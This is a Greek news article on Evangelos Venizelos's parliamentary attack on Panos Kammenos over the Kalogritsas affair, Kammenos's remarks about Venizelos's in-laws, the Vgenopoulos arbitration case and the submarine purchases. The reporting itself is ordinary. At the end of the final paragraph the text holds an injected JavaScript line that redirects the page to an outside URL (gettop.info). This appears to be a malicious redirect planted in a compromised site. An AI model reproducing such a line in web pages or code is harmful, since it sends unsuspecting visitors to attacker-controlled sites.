Βενιζέλος για Καμμένο: Εάν έχει ερωτήσεις περί Καλογρίτσα να τις κάνει στον Σπίρτζη, στον Παππά και στον Τσίπρα

0
31

 

Ολομέτωπη επίθεση κατά του Πάνου Καμμένου εξαπέλυσε ο πρώην πρόεδρος του ΠΑΣΟΚ Ευάγγελος Βενιζέλος με αφορμή δήλωση του προέδρου των ΑΝΕΛ πριν από λίγες μέρες σχετικά με πρόταση Καλογρίτσα παρόντος του Ευάγγελου Βενιζέλου προς τον Πάνο Καμμένο να συμμετάσχει σε κυβέρνηση Σαμαρά-Βενιζέλου.

Αρχικά ο κ.Βενιζέλος απευθυνόμενος προς τον πρόεδρο της Βουλής κ.Βούτση ρώτησε: Κύριε Πρόεδρε, μπορείτε να μου διευκρινίσετε με ποια ιδιότητα μίλησε στη Βουλή ο κ. Καμμένος;
Ν. Βούτσης (ΠτΒ) : Με την ιδιότητα του αρχηγού του κόμματος
Ευ. Βενιζέλος: Του αρχηγού του κόμματος; Θέλω να είναι σαφώς καταγεγραμμένο αυτό στα πρακτικά. Ότι δεν μίλησε με την ιδιότητα του υπουργού. Έχω λόγο που σας ρωτάω, θα καταλάβετε. Δεν κάνω τυχαίες ερωτήσεις.
Ν. Βούτσης (ΠτΒ) : Ποτέ.

Στη συνέχεια ο κ. Βενιζέλος εξαπέλυσε τα πυρά του λέγοντας χαρακτηριστικά: Έχω διαπιστώσει τώρα τελευταία ότι υπάρχει πλήρης ιδεολογική, πολιτική και αισθητική ώσμωση και σύμιξη του ΣΥΡΙΖΑ και των ΑΝΕΛ. Και σήμερα, μετά την κοινή διασκέδαση στο Μέγαρο Μαξίμου, ο κ. Τσίπρας μίλησε από το βήμα της Βουλής ως κλώνος του κ. Καμμένου. Όμως ο αυθεντικός κ. Καμμένος έχει την αξία του. Γιατί δεν μπορεί να ξεφύγει από τις επιλογές του, από τον χαρακτήρα του, και τη φύση του. Η φύση του τον οδηγεί σε προσβολές της προσωπικότητας και σε χυδαιότητες.

Πριν από 40 χρόνια, στη νομική σχολή του Πανεπιστημίου Θεσσαλονίκης, γνώρισα και μετά παντρεύτηκα τη γυναίκα μου που ανήκει σε μια πολυμελή, συντηρητική οικογένεια της βορείου Ελλάδος, την οικογένεια Μπακατσέλου. Ανήκουν όλοι στη ΝΔ. Έχουν στενές σχέσεις με τον Κώστα Καραμανλή. Πολύ στενές σχέσεις. Θα μπορούσε ο κ. Καμμένος, που ανάγεται στον Καραμανλισμό, να έχει ρωτήσει και να έχει πληροφορηθεί.

Συνδέει συνεχώς σχετικούς και ασχέτους που φέρουν το επίθετο αυτό, με εμένα. Με την πολιτική μου δράση και την προσωπικότητά μου.

Είπαμε εμείς ποτέ τίποτα για την οικογένεια Φιλίππου, της πρώτης του συζύγου; Για την οικογένεια Τζούλη, της δευτέρας του συζύγου; Για τον πατέρα του; Για τους συγγενείς του; Να ρωτήσει, να μάθει και να σέβεται το χώρο από τον οποίο προέρχεται και τον οποίο έγλειφε και προσκυνούσε επί χρόνια.

Αυτό αφορά και την υπόθεση Βγενόπουλου. Έχω πει πολλές φορές στην αίθουσα αυτή ότι προτείναμε ως κυβέρνηση στην Κυπριακή Δημοκρατία να ανταλλάξουμε επιστολές και να ακυρώσουμε την διμερή συμφωνία αμοιβαίας προστασίας επενδύσεων Ελλάδας – Κύπρου ώστε να μην μπορεί ο κ. Βγενόπουλος να προσφύγει στο Διεθνές Διαιτητικό Δικαστήριο κατά της Κύπρου αλλά και άλλοι που επικαλούνται την Κύπρο κατά της Ελλάδας. Δεν έγινε. Και αντί να το κάνει τώρα, η σημερινή κυβέρνηση συνεχίζοντας τη γραμμή μας, λέει διάφορες αοριστίες περί του ποιος προστατεύει ποιόν και ποιος διευκολύνει ποιόν.

Αυτό έχει σχέση και με τα υποβρύχια. Εάν ο κ. Καμμένος ήταν νέος στην αίθουσα θα ήμουν πολύ πιο επιεικής. Αλλά έχει ζήσει και έχει στηρίξει την προσπάθεια μου να προστατεύσω το δημόσιο συμφέρον και τα λεφτά του δημοσίου το 2010. Και στην Επιτροπή Εξοπλισμών και στην Ολομέλεια της Βουλής. Εχθές η Καθημερινή κυκλοφόρησε με κορυφαίο τίτλο «Τουρκικά Υποβρύχια στο Αιγαίο». Πως υπάρχουν τα ελληνικά υποβρύχια; Ποιος τα απέκτησε; Ποιος έφερε την κυριότητα; Ποιος έδωσε υπόσταση στα λεφτά του δημοσίου που είχαν δοθεί επί δέκα χρόνια. Ο ομιλών.

Και κάτι ακόμη. Ο κ. Αθανασίου είπε έστειλε ο Άρειος Πάγος. Δεν έστειλε ο Άρειος Πάγος. Έστειλε η εισαγγελία εφετών και το ανακάλεσε το έγγραφο αυτό η Εισαγγελία του ΑΠ. Και όταν ο βουλευτής του κ. Καμμένου ο κ. Κόκκαλης σε μια τηλεοπτική εκπομπή το επικαλέστηκε αυτό, προσκομίστηκε το έγγραφο της Εισαγγελίας του ΑΠ που επιπλήττει τους εισαγγελείς γιατί αναδιαβίβασαν στη Βουλή τα πρακτικά της επειδή η κα Κωνσταντοπούλου καταστρατηγούσε το Σύνταγμα και τους νόμους του κράτους. Η κα Κωνσταντοπούλου, το καμάρι της εποχής εκείνης.

Μια τελευταία κουβέντα: Εάν θέλει να κάνει ερωτήσεις περί Καλογρίτσα ο κ. Καμμένος να τις απευθύνει στον κ. Σπίρτζη, στον κ. Παππά, και στον κ. Τσίπρα. Όχι σε μένα. Αρκετά. Γιατί θα έχουμε μεγάλη συνέχεια εδώ. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here